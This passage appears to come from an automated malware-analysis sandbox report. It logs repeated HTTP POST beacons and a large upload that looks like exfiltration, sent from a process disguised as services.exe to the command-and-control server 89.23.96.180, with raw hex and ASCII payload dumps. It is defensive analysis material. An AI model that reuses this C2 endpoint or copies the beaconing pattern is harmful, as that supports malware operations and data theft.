                                                              Data Ascii: ]SFUX^RSU^UZT]PUWZ\YRVQW_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#91-9=2)_-Y8'Y/.+=4:'11*'?<+%!_.#Q,>
                                                              Dec 21, 2024 10:47:34.894548893 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:35.126171112 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:34 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.54975289.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:36.838028908 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:37.190109015 CET2536OUTData Raw: 58 53 43 51 5d 57 52 52 55 5e 55 5a 54 52 50 55 57 53 5c 5c 52 52 51 5d 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XSCQ]WRRU^UZTRPUWS\\RRQ]_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#,2 29Q*!:<;3$T-;%4?5]112($?==5!_.#Q,
                                                              Dec 21, 2024 10:47:38.213110924 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:38.446055889 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:37 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.54975889.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:38.708815098 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:39.065128088 CET2536OUTData Raw: 58 54 46 52 5d 5a 57 54 55 5e 55 5a 54 53 50 5d 57 53 5c 54 52 5e 51 5b 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XTFR]ZWTU^UZTSP]WS\TR^Q[_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#91,R1=P=19[.?$/+98&4?6&&T( ?==5!_.#Q,


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.54976189.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:39.904587984 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:40.252794027 CET2112OUTData Raw: 58 50 43 5f 5d 5d 57 52 55 5e 55 5a 54 59 50 56 57 5d 5c 5c 52 51 51 5e 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XPC_]]WRU^UZTYPVW]\\RQQ^_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY ./2->!-.;$$R-^945'2+'8(_*!_.#Q,.
                                                              Dec 21, 2024 10:47:41.281209946 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:41.514288902 CET349INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:41 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 39 1c 20 15 2e 0d 28 14 0d 5e 2a 3f 36 50 3d 3d 25 05 2c 22 34 07 21 02 26 10 3d 04 34 01 24 2e 09 58 23 2a 2e 04 36 3f 27 5f 3e 31 2e 58 01 1e 22 1a 21 20 3d 55 27 01 34 0b 29 19 3e 5a 2b 10 2a 13 24 06 33 19 32 39 24 58 3d 29 3c 55 26 3d 26 5c 3b 3f 33 5f 3c 3d 3c 56 24 1c 2b 51 03 1e 25 04 25 05 3b 57 24 23 35 5f 26 3d 21 14 37 2e 38 0d 2a 01 30 0b 20 2b 2e 19 3b 17 27 05 3c 3e 25 01 2a 38 3a 5a 27 3c 28 0c 32 14 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 989 .(^*?6P==%,"4!&=4$.X#*.6?'_>1.X"! =U'4)>Z+*$329$X=)<U&=&\;?3_<=<V$+Q%%;W$#5_&=!7.8*0 +.;'<>%*8:Z'<(2#T-,H1]V0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              10192.168.2.54976289.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:40.050755024 CET422OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Connection: Keep-Alive
                                                              Dec 21, 2024 10:47:40.408865929 CET2536OUTData Raw: 58 56 43 52 58 5c 57 51 55 5e 55 5a 54 5a 50 57 57 5c 5c 5f 52 57 51 5c 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XVCRX\WQU^UZTZPWW\\_RWQ\_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#9!,%9P=.-#%/-" >&16T*'(+>4X+5!_.#Q,"
                                                              Dec 21, 2024 10:47:41.432554007 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:41.669713974 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:41 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              11192.168.2.54976889.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:41.929284096 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:42.283967018 CET2536OUTData Raw: 58 54 43 52 5d 5f 52 52 55 5e 55 5a 54 52 50 50 57 5a 5c 5f 52 5e 51 56 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: XTCR]_RRU^UZTRPPWZ\_R^QV_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY .!(U$-)2"-/'-8S4:&"1?$Z+=^+%!_.#Q,
                                                              Dec 21, 2024 10:47:43.308073997 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:43.542351961 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:43 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              12192.168.2.54977489.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:44.385399103 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:44.737086058 CET2536OUTData Raw: 5d 55 46 52 5d 57 57 57 55 5e 55 5a 54 5e 50 55 57 5f 5c 5b 52 54 51 59 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]UFR]WWWU^UZT^PUW_\[RTQY_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY#,"8&-!T*"*-/;0398 ?%1"*7#Z>-8^*5!_.#Q,2
                                                              Dec 21, 2024 10:47:45.765592098 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:46.001621008 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:45 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              13192.168.2.54977889.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:46.073050976 CET444OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: multipart/form-data; boundary=----zeihSAIObDfjW2EHuTgVjvpXZJn4D45Jgo
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 124358
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:46.424586058 CET12360OUTData Raw: 2d 2d 2d 2d 2d 2d 7a 65 69 68 53 41 49 4f 62 44 66 6a 57 32 45 48 75 54 67 56 6a 76 70 58 5a 4a 6e 34 44 34 35 4a 67 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                              Data Ascii: ------zeihSAIObDfjW2EHuTgVjvpXZJn4D45JgoContent-Disposition: form-data; name="0"Content-Type: text/plainXPFS]^WUU^UZT]PSW[\TRPQ^_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]
                                                              Dec 21, 2024 10:47:46.545506001 CET14832OUTData Raw: 73 31 76 58 36 51 4c 56 59 47 77 69 4a 43 32 66 47 2b 65 62 6a 62 57 4b 51 43 4a 74 64 6a 4f 78 39 41 70 52 7a 52 46 32 57 4d 43 34 31 2f 35 38 49 70 79 5a 58 6c 52 4d 42 75 6b 50 6e 72 34 73 73 4a 6d 55 78 77 75 4c 63 49 48 55 77 56 53 49 33 45
                                                              Data Ascii: s1vX6QLVYGwiJC2fG+ebjbWKQCJtdjOx9ApRzRF2WMC41/58IpyZXlRMBukPnr4ssJmUxwuLcIHUwVSI3En7KJ88AZiyqYxKl/9sEeSR7kam3UnNrcw3a7puSOAK4gQ0c21Vm4bVDovglXWkQsjpj5bDOgLNftJcQXkTWlSJptQU9Vx1BOOgNefmvaJEyBHMI5w7VUQd6dg5bmjHTHexThQQOHKciMxoi+iSUYkKQHTCqzK7qAX
                                                              Dec 21, 2024 10:47:46.545655966 CET9888OUTData Raw: 65 4c 58 4e 5a 54 53 6a 63 41 6a 71 4d 73 30 6a 4e 46 4f 77 59 71 38 6b 43 53 53 63 2b 4f 6f 49 6a 31 4e 43 68 43 4b 6a 6a 65 2f 33 52 59 65 36 62 4f 58 76 39 35 34 49 68 6f 2b 6b 52 4e 50 54 53 45 2b 6a 59 6d 68 53 79 36 30 55 30 53 41 6b 4e 51
                                                              Data Ascii: eLXNZTSjcAjqMs0jNFOwYq8kCSSc+OoIj1NChCKjje/3RYe6bOXv954Iho+kRNPTSE+jYmhSy60U0SAkNQk0rFawQAINYRdUW+WwAtzBhLnMPgOaqSFMYVI2VKVHGhSAbZcQQUs97lzPdYTnuMJ1owkglWmEX8Hk4x4AvYldQhJ6agAX4knKUjzybVLF5lLXNPEr+Rd83sxnA96yoiV35Pv+/SbDCrJStu3K/FXkoHLBk+4CaE1
                                                              Dec 21, 2024 10:47:46.665596008 CET2472OUTData Raw: 44 30 30 6a 37 45 56 49 6c 54 2f 34 77 46 76 4b 68 72 30 55 66 71 36 54 4d 37 69 6f 6b 49 30 74 64 46 52 79 75 77 69 6d 41 2b 46 77 50 33 63 31 66 75 42 63 36 4d 4c 6c 58 68 47 75 33 34 66 49 41 69 65 41 68 68 55 6f 4a 68 58 65 36 6d 78 69 49 79
                                                              Data Ascii: D00j7EVIlT/4wFvKhr0Ufq6TM7iokI0tdFRyuwimA+FwP3c1fuBc6MLlXhGu34fIAieAhhUoJhXe6mxiIy76nDX+8uHA9/UP9rD1/nqoLkO7MPQ714ZaoUnLdVcVK3+5XAz0u9NpNmxn85RxJ+8TtrxPAQIdTHrqUgjHRA/Uoa9FgICA9Ojtm2nEeYGfTaJnpwVNvUyZHxtcSkYb3JNEnt7EZc7GPdZrt3HWk9SukkNl9j0mgYZ
                                                              Dec 21, 2024 10:47:46.665723085 CET9888OUTData Raw: 6c 37 62 71 36 35 38 6b 38 66 55 5a 6a 43 52 51 79 46 66 76 75 76 33 4a 32 72 58 76 51 65 59 46 6e 37 6c 37 4e 4d 54 61 57 38 38 38 32 33 35 6e 57 4b 77 63 43 32 42 79 5a 49 41 47 43 5a 51 72 6e 6b 55 43 68 52 63 64 67 58 4e 57 4d 53 36 6f 54 52
                                                              Data Ascii: l7bq658k8fUZjCRQyFfvuv3J2rXvQeYFn7l7NMTaW888235nWKwcC2ByZIAGCZQrnkUChRcdgXNWMS6oTRqAR7GqtDQ2HISYA78smDskgTzX8g8CKI9WKI/KRQ8kLhKXVlDTobTbf2n3eEebv225hV7Uw2c5V/eLvUr3qdb5beYQ//gRbUFQczQJNO3WRAJVo/avuD7dni0ngdT0x4mnUWtvEo1lvnVJrzdW1owFsVUo12csfPw
                                                              Dec 21, 2024 10:47:46.710148096 CET28428OUTData Raw: 78 2f 58 76 69 71 6a 61 41 30 4b 4d 53 71 6a 70 62 2f 36 66 57 4d 4f 58 76 33 41 75 67 79 67 45 39 6f 2f 42 69 37 42 4b 45 51 50 37 6d 7a 41 58 4e 71 41 6a 6b 4a 4e 78 73 69 67 44 52 70 6e 71 2f 37 6e 73 79 62 4b 71 71 39 2f 4f 49 57 71 42 48 77
                                                              Data Ascii: x/XviqjaA0KMSqjpb/6fWMOXv3AugygE9o/Bi7BKEQP7mzAXNqAjkJNxsigDRpnq/7nsybKqq9/OIWqBHw9ML2lvjdRO7sUvm+whN7bxQPBmMe8zFfWpGzmylTbRopzPCUiwNgdsLKzafYuD+KoI3Cakl6hPNYmbnDxJo0/Jjkjqu/sirgi7lJvg7+3/omQMHFCSyH2qrUIfp8Ov0DFa2D5d6M1eHm5aQEoEnDjiuWHcWO4zLag
                                                              Dec 21, 2024 10:47:46.830816984 CET6180OUTData Raw: 30 65 73 38 38 36 76 2f 4c 57 62 5a 2b 2b 49 6e 7a 54 4d 76 73 68 79 50 51 78 55 6a 33 62 69 6b 47 48 4d 57 30 74 6c 36 30 72 7a 67 72 6e 59 75 2f 4c 72 71 4d 56 73 4b 45 32 47 48 79 78 32 35 51 74 65 46 33 49 57 63 4c 50 6b 71 61 6f 36 57 32 67
                                                              Data Ascii: 0es886v/LWbZ++InzTMvshyPQxUj3bikGHMW0tl60rzgrnYu/LrqMVsKE2GHyx25QteF3IWcLPkqao6W2gZxt576po6PDx2z7CynOBRNONgZ6MX4WGPPKlOc+3IpyF3o6Rj3+6qXma/HNNnpJeR/tnDnid1Fl4T/1nHuUWqbnS1jXdX9wb3Rq8P+a7GvXPcNC27zZ9gVhbuzUGQho/6hy8Mnaf47xed6zVKHDlkXhaJTksZfzpZ
                                                              Dec 21, 2024 10:47:46.878022909 CET1236OUTData Raw: 2f 71 32 55 76 43 61 31 54 38 75 53 75 71 6d 4a 71 65 4c 2f 4b 48 54 39 71 38 37 46 52 76 51 46 67 71 54 6c 6d 51 61 47 66 30 6f 78 66 2f 77 47 43 59 47 51 71 6a 52 78 4b 41 67 62 36 64 56 70 62 57 4c 4b 41 30 66 4b 65 2b 67 35 34 4d 54 44 6b 41
                                                              Data Ascii: /q2UvCa1T8uSuqmJqeL/KHT9q87FRvQFgqTlmQaGf0oxf/wGCYGQqjRxKAgb6dVpbWLKA0fKe+g54MTDkAzgsNfU0ISyVH3rkHjwsxI8Go65Kr0+FvN+Kwev714gaKMNRPdhpDQMEUVdgw675fSIQwCsBAYnsCFAsniDXSz0JH+doA/XsoIrA6CDjR5vh4JABBlYsVAQEZhoWbMxUMs7yAvSa+ENevHELDbeC0ovO5eimQ5R2Po
                                                              Dec 21, 2024 10:47:47.082581997 CET1236OUTData Raw: 66 45 6a 33 6a 55 52 68 61 39 61 52 65 4e 5a 6a 49 44 42 57 4e 64 58 72 53 73 6a 4a 4d 75 48 49 33 36 34 2f 50 6d 4b 75 31 33 6c 73 54 4d 73 48 37 36 41 32 36 6f 38 62 53 6d 78 4c 4c 42 39 4b 77 69 65 4f 4a 30 56 75 31 66 5a 6b 77 54 6a 56 59 4d
                                                              Data Ascii: fEj3jURha9aReNZjIDBWNdXrSsjJMuHI364/PmKu13lsTMsH76A26o8bSmxLLB9KwieOJ0Vu1fZkwTjVYMyrJ4yjYH1z3ad1iraFzZ5DdnrWtnSzFTfnR4bftxhHnvbosHlH/TRdtPhDDv6JvfBYUr3k8VkR7t+7lru/Ap9B9+jUj4/Gjw65J824R8Cyis2H3aZHpq2B0Ce7x+roXnOv4knKMNlXfRFR9+IpOWY+/Lw9PR5vFjw
                                                              Dec 21, 2024 10:47:47.111021996 CET37838OUTData Raw: 37 35 4c 4b 70 46 78 71 46 76 61 53 71 4d 52 76 53 4f 4f 34 4a 54 62 7a 2b 74 48 42 44 79 5a 77 49 52 65 48 4b 37 2b 2f 42 44 43 41 35 37 44 56 58 44 74 4c 63 68 5a 63 6e 6e 62 4c 6e 34 70 75 62 79 47 4c 6a 59 34 38 35 64 51 31 2b 63 71 2b 77 57
                                                              Data Ascii: 75LKpFxqFvaSqMRvSOO4JTbz+tHBDyZwIReHK7+/BDCA57DVXDtLchZcnnbLn4pubyGLjY485dQ1+cq+wWUmovsH2rOxwE2U4N67uHndq6Fb1PsTvnGjbUN9Tk4pDrcOD+z+SgAtagHX6qdcUNHu5NBBpOrRAgEUb0xpnhEqevwpc9n7mXdAuriovNc77kULL4eU5u/e6qUxZSWvApJ7nZ4Ilfaunv96Gb2rF2Mr4jzkEaCLKdh
                                                              Dec 21, 2024 10:47:47.459249020 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:48.051790953 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:47 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0
                                                              Dec 21, 2024 10:47:48.053524971 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2112
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:48.514823914 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:49.070000887 CET349INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:48 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 39 38 0d 0a 0e 1e 3a 0e 21 2b 3d 53 28 29 3f 10 3d 3f 3a 1d 2a 3d 25 00 2c 1c 05 17 22 3c 32 13 2a 3e 3f 10 27 00 3b 59 23 2a 32 02 36 11 2f 1d 29 0b 2e 58 01 1e 21 0b 23 55 29 57 33 3f 23 57 2a 0e 3a 5e 3c 2e 0f 04 24 3f 23 50 32 3a 12 5f 28 2a 28 1e 26 03 3e 5b 38 2f 0d 5a 28 10 20 1d 27 1c 2b 51 03 1e 26 1f 31 2c 05 56 31 0a 35 5a 25 00 00 00 22 2d 27 55 3f 3b 2c 08 23 15 2e 5c 2c 00 3c 58 3f 04 3e 11 2a 2b 32 13 33 5a 37 55 24 2e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 98:!+=S()?=?:*=%,"<2*>?';Y#*26/).X!#U)W3?#W*:^<.$?#P2:_(*(&>[8/Z( '+Q&1,V15Z%"-'U?;,#.\,<X?>*+23Z7U$.#T-,H1]V0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              14192.168.2.54977989.23.96.180801352C:\Windows\InputMethod\CHT\services.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 21, 2024 10:47:46.291668892 CET398OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                              Host: 89.23.96.180
                                                              Content-Length: 2536
                                                              Expect: 100-continue
                                                              Dec 21, 2024 10:47:46.643245935 CET2536OUTData Raw: 5d 53 43 50 5d 5f 52 55 55 5e 55 5a 54 59 50 54 57 59 5c 58 52 50 51 57 5f 5d 58 5e 54 5c 5d 59 5f 5b 54 58 5a 5f 53 5f 59 5a 55 5e 54 57 51 5d 52 56 5b 41 5d 52 57 52 59 5e 50 52 54 56 58 58 50 5b 58 5c 5a 5e 51 56 5d 5f 42 5a 44 5f 5f 55 5b 5c
                                                              Data Ascii: ]SCP]_RUU^UZTYPTWY\XRPQW_]X^T\]Y_[TXZ_S_YZU^TWQ]RV[A]RWRY^PRTVXXP[X\Z^QV]_BZD__U[\X^TZ\_U_VRZQQVPV\]XYXRXSFYXX__^RTWCZPV]Y\^T[[_UQ]^RX][Y^]QXUYWWZPGUX^R]CC_\^PYAVYZ^YVR^ZP[T\PPF^__B[UY @.1R%--W>*9,$\%<8:85P#?*1T"+7?^(['=!_.#Q,.
                                                              Dec 21, 2024 10:47:47.667426109 CET25INHTTP/1.1 100 Continue
                                                              Dec 21, 2024 10:47:47.906095028 CET200INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sat, 21 Dec 2024 09:47:47 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Vary: Accept-Encoding
                                                              Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 4<V@[0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
